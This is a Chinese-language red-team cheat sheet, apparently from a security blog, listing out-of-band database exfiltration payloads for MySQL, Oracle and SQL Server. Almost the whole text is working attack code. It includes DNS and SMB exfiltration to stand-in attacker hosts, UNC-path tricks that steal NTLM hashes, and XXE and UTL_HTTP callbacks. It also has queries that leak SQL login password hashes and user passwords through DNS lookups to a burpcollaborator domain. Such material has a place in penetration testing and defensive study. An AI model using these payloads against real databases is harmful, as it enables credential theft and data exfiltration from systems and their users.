数据库数据转储

1 year ago
red.ghostwolflab.com
3 minutes

MySQL

DNS 转储

select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874))

SMB

SELECT * FROM USERS INTO OUTFILE '\\attacker\SMBshare\output.txt'

HTTP Server

select @@version into outfile '\\\\192.168.0.100\\temp\\out.txt';
select @@version into dumpfile '\\\\192.168.0.100\\temp\\out.txt

UNC 路径 NTLM Hash窃取

select load_file('\\\\error\\abc');
select load_file(0x5c5c5c5c6572726f725c5c616263);
select 'osanda' into dumpfile '\\\\error\\abc';
select 'osanda' into outfile '\\\\error\\abc';
load data infile '\\\\error\\abc' into table database.table_name;

Oracle

多行合并转储

SELECT dbms_xmlgen.getxmltype('select user from dual') FROM dual

XML 外部实体

SELECT xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://IP/test"> %remote; %param1;]>') FROM dual;

HTTP请求(11gR2之前版本)

SELECT UTL_HTTP.request ('http://IP/test') FROM dual;

特殊字符转义

SELECT UTL_URL.escape('http://IP/' || USER) FROM dual;

SQL Server

DNS 查询

DECLARE @host varchar(800);
select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.netspi.com' from sys.sql_logins;
exec('xp_fileexist "\' + @host + 'c$boot.ini"');

UNC 路径

1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';-- 

xp_dirtree '\\attackerip\file'
xp_fileexist '\\attackerip\file'

BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
BACKUP DATABASE [TESTING] TO DISK = '\\attackeri\file'

RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
RESTORE DATABASE [TESTING] FROM DISK = '\\attackerip\file'
RESTORE HEADERONLY FROM DISK = '\\attackerip\file'
RESTORE FILELISTONLY FROM DISK = '\\attackerip\file'
RESTORE LABELONLY FROM DISK = '\\attackerip\file'
RESTORE REWINDONLY FROM DISK = '\\attackerip\file'
RESTORE VERIFYONLY FROM DISK = '\\attackerip\file'

启用 sp_send_dbmail 查询

sp_configure 'show advanced options', 1;RECONFIGURE;sp_configure 'Database Mail XPs', 1;RECONFIGURE;exec msdb..sp_send_dbmail @recipients='snowwolf@ghostwolflab.com',@query='select @@version';

xp_sendmail 查询

EXEC master..xp_sendmail 'snowwolf@ghostwolflab.com', 'This is a test.'

使用 xp_sendmail 发送完整邮件

EXEC xp_sendmail @recipients='snowwolf@ghostwolflab.com',
@message='This is a test.',
@copy_recipients='nosnowwolf@ghostwolflab.com',
@subject='TEST'

通过 xp_sendmail 发送查询结果

EXEC xp_sendmail 'snowwolf@ghostwolflab.com', @query='SELECT @@version';

通过 xp_sendmail 将查询结果作为附件发送

CREATE TABLE ##texttab (c1 text)
INSERT ##texttab values ('Put messge here.')
DECLARE @cmd varchar(56)
SET @cmd = 'SELECT c1 from ##texttab'
EXEC master.dbo.xp_sendmail 'robertk',
@query = @cmd, @no_header='TRUE'
DROP TABLE ##texttab

fn_trace_gettable

# Permissions: Requires VIEW SERVER STATE permission on the server.
1 and exists(select * from fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.xem',null,null))

# Permissions: Requires the CONTROL SERVER permission.
1 (select 1 where exists(select * from fn_get_audit_file('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\',default,default)))
1 and exists(select * from fn_trace_gettable('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.trc',default))